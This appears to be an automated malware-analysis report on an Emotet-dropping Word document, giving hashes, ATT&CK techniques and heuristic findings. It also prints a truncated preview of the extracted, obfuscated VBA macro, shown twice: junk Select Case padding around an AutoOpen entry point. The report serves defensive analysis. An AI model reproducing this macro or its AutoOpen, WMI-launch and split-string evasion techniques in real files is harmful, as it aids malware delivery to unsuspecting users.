Emotet Office (OLE) malware analysis — malicious · b1dced28edb0f204

MALICIOUS

Office (OLE)

155.6 KB Created: 2019-05-02 09:19:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: 922dc8459d56833d2bdf2d6b565e7471 SHA-1: 043d9f8f9ba4e44679c055df0a63988ba5672886 SHA-256: b1dced28edb0f204dfeddacb104281bf43b041d6dfb17f063aed46e5b5437998

302 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1047 Windows Management Instrumentation

The sample contains a VBA macro with an AutoOpen function, a common technique for Emotet. The macro utilizes obfuscation by splitting keywords and employs the GetObject and CreateObject methods to launch the Win32_Process WMI object. This indicates an intent to execute arbitrary code, likely to download and run a secondary payload.

Heuristics 8

ClamAV: Doc.Dropper.Emotet-6960223-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Emotet-6960223-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9201 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9201 bytes
SHA-256: `c3183ded15217a12081707e16167b0c223d52a12137d99d343ab797271373468`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "vZQBAXDA" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "rBXBAw" Attribute VB_Base = "0{DA881A5D-0836-41DC-AEB2-A125F0175BA1}{D4B0A26D-D51C-4919-BF00-92AD42DAA9D3}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "mAwkQo_" Attribute VB_Name = "VxZ4ZUDD" Attribute VB_Name = "roA__U" Attribute VB_Name = "PZUxGAA" Attribute VB_Base = "0{CC7D7E51-64C9-4260-859B-37869BA4B74A}{22AA04A1-E257-4F6E-9D53-4273588B9F0D}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "RAkQZCBw" Function zAAcAAok(XXwBU_) Select Case wwAxBADX Case sAxBAAQ = i1CUkZ = Sgn(550058908) Case EAxUBZo = IkAACcZB Case zAxB_AkA = Log(hZ1BcDAZ) Case bcAwUAA = CBool(601425413) Case uBUoADDG = 578024120 Case sB4AAB4D = CDate(ADUAxZQ) End Select Select Case oUAAAU Case l1AB_D = nwZ41AB = Sgn(797824526) Case LAAAxDAw = iBDUoo Case CAQA_GD = Log(PUAAAA) Case Cc1ACkw = CBool(256259059) Case KAAAAZ = 63024513 Case GA_ADA = CDate(bGoAAAw) End Select Select Case fBAcAw Case mCAo_Ax = WGAQ_QU = Sgn(899597438) Case DUxAAG = DUCAB_ Case EQAZAZC = Log(FAAAxCD) Case qAAwXX = CBool(186977685) Case d_UkDZC_ = 151233042 Case KBAAAC = CDate(DAQBDA) End Select Set zAAcAAok = CVar(XXwBU_) Select Case zAA1DQoA Case fcAcBoU = FAUDAoBA = Sgn(656225116) Case iUckBU = P1kAAG Case rDBQ1Q4k = Log(w1AwkwB) Case KcAAoA_U = CBool(611319429) Case YAAXxAA = 887026783 Case ooAAAGAA = CDate(uQcUGXwC) End Select Select Case h4xA1AGc Case swxwABA1 = jAAoAAAA = Sgn(301982635) Case IBDDAADG = wZcoAZA Case GAwXXw = Log(hAUAGA) Case iCoAAAAA = CBool(361250033) Case qxAGXQcQ = 923882045 Case ukCAUZx = CDate(IAXAQA) End Select Select Case icQXD_ Case MBUQ1AD = wkA_1GBA = Sgn(243527934) Case sZAAUAXA = EGo_oowk Case KoBBAk4 = Log(LkBUAQ) Case oABA4QB = CBool(877241998) Case AUQACA = 171351521 Case wwGBBAAk = CDate(wkCAU_) End Select End Function Sub autoopen() Select Case cBAoGQw Case tAUo4cGx = IAA_4A = Sgn(196025023) Case dDZABA4w = YDAAAA Case PZAABAo = Log(mUAA_k1) Case TxBBxQB = CBool(991855700) Case lkA1AGoX = 272388466 Case XAA4BBAU = CDate(HBAAAA) End Select Select Case XUAABQA Case NwQQGA = qAZ1AD = Sgn(944438535) Case jAAQ1ADQ = zQAUUUX Case wDUUDDQ = Log(FxAD1A) Case uZCCAcwA = CBool(68302783) Case EDBwc_ = 100047039 Case KAAQAwGA = CDate(MoBUAUA) End Select Call iDAcAA_ Select Case m_ABACU Case ZkA_CXA = pAkAAA = Sgn(972134484) Case K1k4QA1A = MAA_AQ Case jAA41oC = Log(V1UABG) Case cAoDAXA = CBool(87970600) Case PAADoAGD = 811506297 Case zwGABoA = CDate(TwAcXk) End Select Select Case zwcU4w Case jAAAwAA4 = kAAwwXA = Sgn(187444709) Case a4UAXUA = RQA1AD Case MD__AU = Log(QAAcQ_) Case jAxAZCBw = CBool(151680405) Case FD4UkQkG = 90864516 Case nAZUokU1 = CDate(H44cAAB1) End Select Select Case pBBX4BZ_ Case IcZXABQ = zAZBBU = Sgn(564969840) Case SZoAAxok = cADQCUG Case JCwAAAG = Log(AcQAAA) Case nAw_ACA = CBool(160149357) Case vABAXAXZ = 755378081 Case zBAZ4Dw = CDate(cAA4AUA) End Select End Sub Attribute VB_Name = "iAA4QAAo" Function iDAcAA_() On Error Resume Next Select Case zGBA1Ao Case tkBACZAA = FDDAD_ = Sgn(631693264) Case CBXGkB_ = QCAcBC Case PZAAAAGX = Log(vAwDAAU) Case j_AAZA = CBool(264781617) Case zkAkGBA = 139097869 Case uwZZ_xQ = CDate(w1cB4QUA) End Select Select Case MUAQ_Bx Case i_cDBA4A = tUAAwAX = Sgn(980031380) Case rUQAAD1B = n1xcA1B Case w_QAAA = Log(EBZAoBAk) Case c_XZxAA4 = CBool(575324403) Case NCGD ... (truncated)

SHA-256: c3183ded15217a12081707e16167b0c223d52a12137d99d343ab797271373468

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "vZQBAXDA"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "rBXBAw"
Attribute VB_Base = "0{DA881A5D-0836-41DC-AEB2-A125F0175BA1}{D4B0A26D-D51C-4919-BF00-92AD42DAA9D3}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "mAwkQo_"

Attribute VB_Name = "VxZ4ZUDD"

Attribute VB_Name = "roA__U"

Attribute VB_Name = "PZUxGAA"
Attribute VB_Base = "0{CC7D7E51-64C9-4260-859B-37869BA4B74A}{22AA04A1-E257-4F6E-9D53-4273588B9F0D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "RAkQZCBw"
Function zAAcAAok(XXwBU_)
   Select Case wwAxBADX
Case sAxBAAQ = i1CUkZ = Sgn(550058908)
Case EAxUBZo = IkAACcZB
Case zAxB_AkA = Log(hZ1BcDAZ)
Case bcAwUAA = CBool(601425413)
Case uBUoADDG = 578024120
Case sB4AAB4D = CDate(ADUAxZQ)
End Select
   Select Case oUAAAU
Case l1AB_D = nwZ41AB = Sgn(797824526)
Case LAAAxDAw = iBDUoo
Case CAQA_GD = Log(PUAAAA)
Case Cc1ACkw = CBool(256259059)
Case KAAAAZ = 63024513
Case GA_ADA = CDate(bGoAAAw)
End Select
   Select Case fBAcAw
Case mCAo_Ax = WGAQ_QU = Sgn(899597438)
Case DUxAAG = DUCAB_
Case EQAZAZC = Log(FAAAxCD)
Case qAAwXX = CBool(186977685)
Case d_UkDZC_ = 151233042
Case KBAAAC = CDate(DAQBDA)
End Select
Set zAAcAAok = CVar(XXwBU_)
   Select Case zAA1DQoA
Case fcAcBoU = FAUDAoBA = Sgn(656225116)
Case iUckBU = P1kAAG
Case rDBQ1Q4k = Log(w1AwkwB)
Case KcAAoA_U = CBool(611319429)
Case YAAXxAA = 887026783
Case ooAAAGAA = CDate(uQcUGXwC)
End Select
   Select Case h4xA1AGc
Case swxwABA1 = jAAoAAAA = Sgn(301982635)
Case IBDDAADG = wZcoAZA
Case GAwXXw = Log(hAUAGA)
Case iCoAAAAA = CBool(361250033)
Case qxAGXQcQ = 923882045
Case ukCAUZx = CDate(IAXAQA)
End Select
   Select Case icQXD_
Case MBUQ1AD = wkA_1GBA = Sgn(243527934)
Case sZAAUAXA = EGo_oowk
Case KoBBAk4 = Log(LkBUAQ)
Case oABA4QB = CBool(877241998)
Case AUQACA = 171351521
Case wwGBBAAk = CDate(wkCAU_)
End Select
End Function
Sub autoopen()
   Select Case cBAoGQw
Case tAUo4cGx = IAA_4A = Sgn(196025023)
Case dDZABA4w = YDAAAA
Case PZAABAo = Log(mUAA_k1)
Case TxBBxQB = CBool(991855700)
Case lkA1AGoX = 272388466
Case XAA4BBAU = CDate(HBAAAA)
End Select
   Select Case XUAABQA
Case NwQQGA = qAZ1AD = Sgn(944438535)
Case jAAQ1ADQ = zQAUUUX
Case wDUUDDQ = Log(FxAD1A)
Case uZCCAcwA = CBool(68302783)
Case EDBwc_ = 100047039
Case KAAQAwGA = CDate(MoBUAUA)
End Select
Call iDAcAA_
   Select Case m_ABACU
Case ZkA_CXA = pAkAAA = Sgn(972134484)
Case K1k4QA1A = MAA_AQ
Case jAA41oC = Log(V1UABG)
Case cAoDAXA = CBool(87970600)
Case PAADoAGD = 811506297
Case zwGABoA = CDate(TwAcXk)
End Select
   Select Case zwcU4w
Case jAAAwAA4 = kAAwwXA = Sgn(187444709)
Case a4UAXUA = RQA1AD
Case MD__AU = Log(QAAcQ_)
Case jAxAZCBw = CBool(151680405)
Case FD4UkQkG = 90864516
Case nAZUokU1 = CDate(H44cAAB1)
End Select
   Select Case pBBX4BZ_
Case IcZXABQ = zAZBBU = Sgn(564969840)
Case SZoAAxok = cADQCUG
Case JCwAAAG = Log(AcQAAA)
Case nAw_ACA = CBool(160149357)
Case vABAXAXZ = 755378081
Case zBAZ4Dw = CDate(cAA4AUA)
End Select
End Sub

Attribute VB_Name = "iAA4QAAo"
Function iDAcAA_()
On Error Resume Next
   Select Case zGBA1Ao
Case tkBACZAA = FDDAD_ = Sgn(631693264)
Case CBXGkB_ = QCAcBC
Case PZAAAAGX = Log(vAwDAAU)
Case j_AAZA = CBool(264781617)
Case zkAkGBA = 139097869
Case uwZZ_xQ = CDate(w1cB4QUA)
End Select
   Select Case MUAQ_Bx
Case i_cDBA4A = tUAAwAX = Sgn(980031380)
Case rUQAAD1B = n1xcA1B
Case w_QAAA = Log(EBZAoBAk)
Case c_XZxAA4 = CBool(575324403)
Case NCGD
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.